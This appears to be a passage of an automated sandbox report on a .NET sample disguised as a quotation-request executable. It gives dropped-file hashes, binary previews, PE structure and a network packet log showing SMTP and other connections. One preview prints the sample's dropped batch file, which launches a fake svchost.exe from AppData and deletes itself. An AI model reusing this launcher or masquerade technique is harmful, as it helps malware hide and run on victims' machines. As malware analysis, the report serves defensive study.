                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbndurr1.fvw.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wed2prrq.4n0.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoypvla0.5i2.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):151
                                                                        Entropy (8bit):5.07788813917422
                                                                        Encrypted:false
                                                                        SSDEEP:3:mKDDCMNqTtvL5ot+kiEaKC5ZACSmqRDt+kiE2J5xAInTRI3oaLHVZPy:hWKqTtT6wknaZ5Omq1wkn23fTNazVk
                                                                        MD5:FC80A1DB853B4A98AAE9CE901F05BF6E
                                                                        SHA1:820B615C0B086E37094B49DE81E8518083CAFFD7
                                                                        SHA-256:B68843F1BC66F94BB3C2644ABBD565FEC94AA27A79132C6AE51C1B701A6FF26A
                                                                        SHA-512:D44FACA4404E787713CE50E5E81968283D29769F4B55C1B96DA27AEC61420869E9E0D798D19DBD9431120FE355EFB4DA1E359EE2750C3767802972F17E80EAA2
                                                                        Malicious:false
                                                                        Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchost.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp89F4.tmp.bat" /f /q..

                                                                        C:\Users\user\AppData\Roaming\svchost.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                                                                        File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):690092
                                                                        Entropy (8bit):7.889824999593694
                                                                        Encrypted:false
                                                                        SSDEEP:12288:A5rkOKFLWcw4n3BzGC9t1SJFrg632LvRpVR09BQoq:ckOKFiX4xy6c86G7BR09B3q
                                                                        MD5:E184C8B191B12744E919B3B95CE39A0E
                                                                        SHA1:FE25931E12B1F5807B95CF222CD9EE74C2CB7EA2
                                                                        SHA-256:DF9E900BC2ABA3462D0B9D2FB4E81719604F4C63871A2225EDCE136C140E8FC8
                                                                        SHA-512:8DF2BB22F07EB282247D5B98D627FC5CF8D5AC9958304C43A8916EB4EF2ECF9627AD753C07206576E9550672E57581767DCB0B1CF140BC7F2F76BDEF37A89719
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 37%
                                                                        • Antivirus: Virustotal, Detection: 36%, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..Z............... ....@...... .......................`......v.....`.............................................................f............................y............................................................... ..H............text....Z... ...\.................. ..`.rsrc...f............^..............@..@........................................H.......|>...;......M...................................................".(.....*b.(............%...}....*>.(.......}....*>.(.......}....*".(.....*B...}......}....**..(......**...(....&**...(....&**...(....&*.~'...*...'...*.~(...*...(...*.~)...*...)...*.~*...*...*...*R...{ ... ....`} ...*R...{ ... ...._} ...*R...{ ... ...@`} ...*R...{ ... ...._} ...*R...{ ... ... `} ...*R...{ ... ...._} ...*>..|.....(?....**...(?....*".(.....*".(.....*".(.....*n.{M...{K....{L....X.......*.0..8.......

                                                                        C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe

                                                                        Download File
                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):43008
                                                                        Entropy (8bit):6.244941989510716
                                                                        Encrypted:false
                                                                        SSDEEP:384:ac3JOvwWj8Gpw0A67dOpRipKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+TsPZX:a4JU8g17dG6Iq8XMnVYqW2Xmh829ukc
                                                                        MD5:9827FF3CDF4B83F9C86354606736CA9C
                                                                        SHA1:E73D73F42BB2A310F03EB1BCBB22BE2B8EB7C723
                                                                        SHA-256:C1CF3DC8FA1C7FC00F88E07AD539979B3706CA8D69223CFFD1D58BC8F521F63A
                                                                        SHA-512:8261828D55F3B5134C0AEB98311C04E20C5395D4347251746F3BE0FB854F36CC7E118713CD00C9867537E6E47D5E71F2B2384FC00C67F0AE1B285B8310321579
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                        Joe Sandbox View:
                                                                        • Filename: PO454323 Pdf.exe, Detection: malicious, Browse
                                                                        • Filename: SARL RABINEAU Order FA2495.exe, Detection: malicious, Browse
                                                                        • Filename: 090998948.vbs, Detection: malicious, Browse
                                                                        • Filename: SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exe, Detection: malicious, Browse
                                                                        • Filename: FEDEX & INVOICE.Tracking Details.exe, Detection: malicious, Browse
                                                                        • Filename: 63762524.vbs, Detection: malicious, Browse
                                                                        • Filename: 48727365.vbs, Detection: malicious, Browse
                                                                        • Filename: 329182736.vbs, Detection: malicious, Browse
                                                                        • Filename: payment pdf.exe, Detection: malicious, Browse
                                                                        • Filename: FAC- IST9G4VW.exe, Detection: malicious, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D>.]..............0..X...........w... ........@.. ..............................p.....`.................................Hw..O....... ............f...B...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..

                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                        Category:dropped
                                                                        Size (bytes):1835008
                                                                        Entropy (8bit):4.465522001984657
                                                                        Encrypted:false
                                                                        SSDEEP:6144:eIXfpi67eLPU9skLmb0b4OWSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbr:zXD94OWlLZMM6YFH5+r
                                                                        MD5:FF1F583D2D45CD4C3F8401CD449F2170
                                                                        SHA1:95D0637022E64B84B026FDCFF65AD364F911EC6A
                                                                        SHA-256:857CCAADB2353FBDE5ABEA77487E455B7F93BF439FFBDECDDF45AD5D787130B1
                                                                        SHA-512:DEE945F6816CB744463F129169F26AA801F29AFBE56637DC58BFF208230C00ECE29DE8A912443B4AA3B82E246FC5E9B9A85557ABBBB37E805A49773AFE2CF9EB
                                                                        Malicious:false
                                                                        Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmr.%H.................................................................................................................................................................................................................................................................................................................................................3|........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        \Device\Null

                                                                        Download File
                                                                        Process:C:\Windows\System32\timeout.exe
                                                                        File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.41440934524794
                                                                        Encrypted:false
                                                                        SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                        MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                        SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                        SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                        SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                        Malicious:false
                                                                        Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.889824999593694
                                                                        TrID:
                                                                        • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                                        • Win64 Executable Console (202006/5) 47.64%
                                                                        • Win64 Executable (generic) (12005/4) 2.83%
                                                                        • Generic Win/DOS Executable (2004/3) 0.47%
                                                                        • DOS Executable Generic (2002/1) 0.47%
                                                                        File name:RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                                                                        File size:690'092 bytes
                                                                        MD5:e184c8b191b12744e919b3b95ce39a0e
                                                                        SHA1:fe25931e12b1f5807b95cf222cd9ee74c2cb7ea2
                                                                        SHA256:df9e900bc2aba3462d0b9d2fb4e81719604f4c63871a2225edce136c140e8fc8
                                                                        SHA512:8df2bb22f07eb282247d5b98d627fc5cf8d5ac9958304c43a8916eb4ef2ecf9627ad753c07206576e9550672e57581767dcb0b1cf140bc7f2f76bdef37a89719
                                                                        SSDEEP:12288:A5rkOKFLWcw4n3BzGC9t1SJFrg632LvRpVR09BQoq:ckOKFiX4xy6c86G7BR09B3q
                                                                        TLSH:25E41207F61CA38ED7DA8AF6397A023012289FA35940BC49F9E8FD6D153178C69135E7
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..Z............... ....@...... .......................`......v.....`................................

                                                                        File Icon

                                                                        Icon Hash:24ed8d96b2ade832

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x400000
                                                                        Entrypoint Section:
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows cui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0xFAFBEEAE [Sat Jun 9 06:43:58 2103 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        dec ebp
                                                                        pop edx
                                                                        nop
                                                                        add byte ptr [ebx], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax+eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000xd866.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x79fe0x1c.text
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000x5a1a0x5c00457150ed573d86e059095744a029ff6fFalse0.490531589673913data5.84563717318207IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x80000xd8660xda00bcd9c5f638d0c24686a93e204983d0c2False0.09005877293577981data3.7589393984411688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0x81440xd228Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/m0.07864312267657993
                                                                        RT_GROUP_ICON0x1536c0x14data1.15
                                                                        RT_VERSION0x153800x2fcdata0.43455497382198954
                                                                        RT_MANIFEST0x1567c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                        Network Behavior

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        May 8, 2024 09:20:47.086616993 CEST49675443192.168.2.4173.222.162.32
                                                                        May 8, 2024 09:20:48.242893934 CEST49678443192.168.2.4104.46.162.224
                                                                        May 8, 2024 09:20:56.695885897 CEST49675443192.168.2.4173.222.162.32
                                                                        May 8, 2024 09:21:03.240431070 CEST49730443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:03.240458012 CEST44349730104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:03.240546942 CEST49730443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:03.278233051 CEST49730443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:03.278249025 CEST44349730104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:03.616898060 CEST44349730104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:03.616978884 CEST49730443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:03.628257990 CEST49730443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:03.628277063 CEST44349730104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:03.628508091 CEST44349730104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:03.680249929 CEST49730443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:04.518321991 CEST49730443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:04.560128927 CEST44349730104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:04.734947920 CEST44349730104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:04.735007048 CEST44349730104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:04.735138893 CEST49730443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:04.759654999 CEST49730443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:05.093671083 CEST4973180192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:05.256122112 CEST8049731208.95.112.1192.168.2.4
                                                                        May 8, 2024 09:21:05.256225109 CEST4973180192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:05.256422043 CEST4973180192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:05.419017076 CEST8049731208.95.112.1192.168.2.4
                                                                        May 8, 2024 09:21:05.461514950 CEST4973180192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:08.692528009 CEST49732443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:08.692581892 CEST44349732104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:08.692656040 CEST49732443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:08.767729044 CEST49732443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:08.767777920 CEST44349732104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:09.104895115 CEST44349732104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:09.104975939 CEST49732443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:09.106631041 CEST49732443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:09.106650114 CEST44349732104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:09.106952906 CEST44349732104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:09.165087938 CEST49732443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:09.208125114 CEST44349732104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:09.527292967 CEST44349732104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:09.527354956 CEST44349732104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:09.527580976 CEST49732443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:09.531440973 CEST49732443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:09.538868904 CEST4973380192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:09.700952053 CEST8049733208.95.112.1192.168.2.4
                                                                        May 8, 2024 09:21:09.701035023 CEST4973380192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:09.701174974 CEST4973380192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:09.864020109 CEST8049733208.95.112.1192.168.2.4
                                                                        May 8, 2024 09:21:09.977161884 CEST4973380192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:11.006592035 CEST4973380192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:11.168792009 CEST8049733208.95.112.1192.168.2.4
                                                                        May 8, 2024 09:21:11.168889999 CEST4973380192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:11.272459030 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:11.594496965 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:11.594607115 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:11.920242071 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:11.920680046 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:12.241900921 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:12.242719889 CEST4973180192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:12.243499994 CEST49742587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:12.404956102 CEST8049731208.95.112.1192.168.2.4
                                                                        May 8, 2024 09:21:12.408198118 CEST4973180192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:12.468164921 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:12.468178988 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:12.468240023 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:12.468358040 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:12.563229084 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:12.563333988 CEST49742587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:12.793026924 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:12.793222904 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:12.793654919 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:12.884509087 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:12.885888100 CEST49742587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:13.116566896 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:13.116580963 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:13.116592884 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:13.116658926 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:13.126113892 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:13.206696033 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:13.207757950 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:13.207770109 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:13.207781076 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:13.207828045 CEST49742587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:13.207923889 CEST49742587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:13.447860003 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:13.453589916 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:13.527707100 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:13.545315981 CEST49742587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:13.778259039 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:13.778333902 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:13.778445959 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:13.780826092 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:13.869292021 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:13.869306087 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:13.869317055 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:13.869371891 CEST49742587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:13.908993959 CEST49742587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:14.102818966 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:14.103207111 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:14.228830099 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:14.367757082 CEST49742587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:14.464112043 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:14.493489027 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:14.493843079 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:14.815711021 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:14.817444086 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:14.818057060 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:14.912858009 CEST49745443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:14.912895918 CEST44349745104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:14.912955999 CEST49745443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:14.925420046 CEST49745443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:14.925445080 CEST44349745104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:15.095591068 CEST49742587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:15.142823935 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:15.145044088 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:15.260723114 CEST44349745104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:15.260822058 CEST49745443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:15.262480021 CEST49745443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:15.262497902 CEST44349745104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:15.262742996 CEST44349745104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:15.353684902 CEST49745443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:15.365974903 CEST49745443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:15.412122011 CEST44349745104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:15.415256023 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:15.415271997 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:15.415287018 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:15.415338039 CEST49742587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:15.445575953 CEST49742587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:15.466702938 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:15.468446970 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:15.468518019 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:15.468835115 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:15.468866110 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:15.694040060 CEST44349745104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:15.694103003 CEST44349745104.26.13.205192.168.2.4
                                                                        May 8, 2024 09:21:15.694147110 CEST49745443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:15.697092056 CEST49745443192.168.2.4104.26.13.205
                                                                        May 8, 2024 09:21:15.699955940 CEST4974680192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:15.765372038 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:15.765836954 CEST49742587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:15.789602041 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:15.789987087 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:15.863029003 CEST8049746208.95.112.1192.168.2.4
                                                                        May 8, 2024 09:21:15.863158941 CEST4974680192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:15.865681887 CEST4974680192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:16.029175043 CEST8049746208.95.112.1192.168.2.4
                                                                        May 8, 2024 09:21:16.039457083 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:16.125786066 CEST58749742185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:16.180485964 CEST4974680192.168.2.4208.95.112.1
                                                                        May 8, 2024 09:21:16.180517912 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:16.180525064 CEST49742587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:16.218427896 CEST49742587192.168.2.4185.230.214.164
